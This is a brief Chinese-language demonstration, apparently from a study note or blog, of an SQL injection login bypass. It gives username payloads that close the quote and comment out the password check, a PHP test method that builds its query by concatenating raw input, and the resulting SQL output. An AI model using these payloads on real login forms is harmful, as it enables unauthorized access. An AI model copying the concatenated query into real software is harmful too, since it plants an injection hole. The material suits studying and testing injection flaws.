初步注入–绕过验证,直接登录
user_name : ’ ‘or ‘1’=’1’)# 或 ’ ‘or ‘1’=’1’)–
password : 123456
/**
* 测SQL注入试注入
*/
public function test(){
$login = M('user');
$username = I('param.username');
$password = md5(md5(I('param.password')) . C('AUTHCODE'));
$data = $login->where('deleted=0 and hidden=0 and username='.$username.' and password='.$password)
->find();
$this->res_data['data'] = $login->getLastSql();
$this->apiReply();
}
输出:
执行的sql语句:SELECT * FROM hq_user
WHERE ( deleted=0 and hidden=0 and username=’ ‘or ‘1’=’1’)# and password=123456 ) LIMIT 1
这样就被绕出去了。 #号后面也被注释掉了 这样登录就被破解了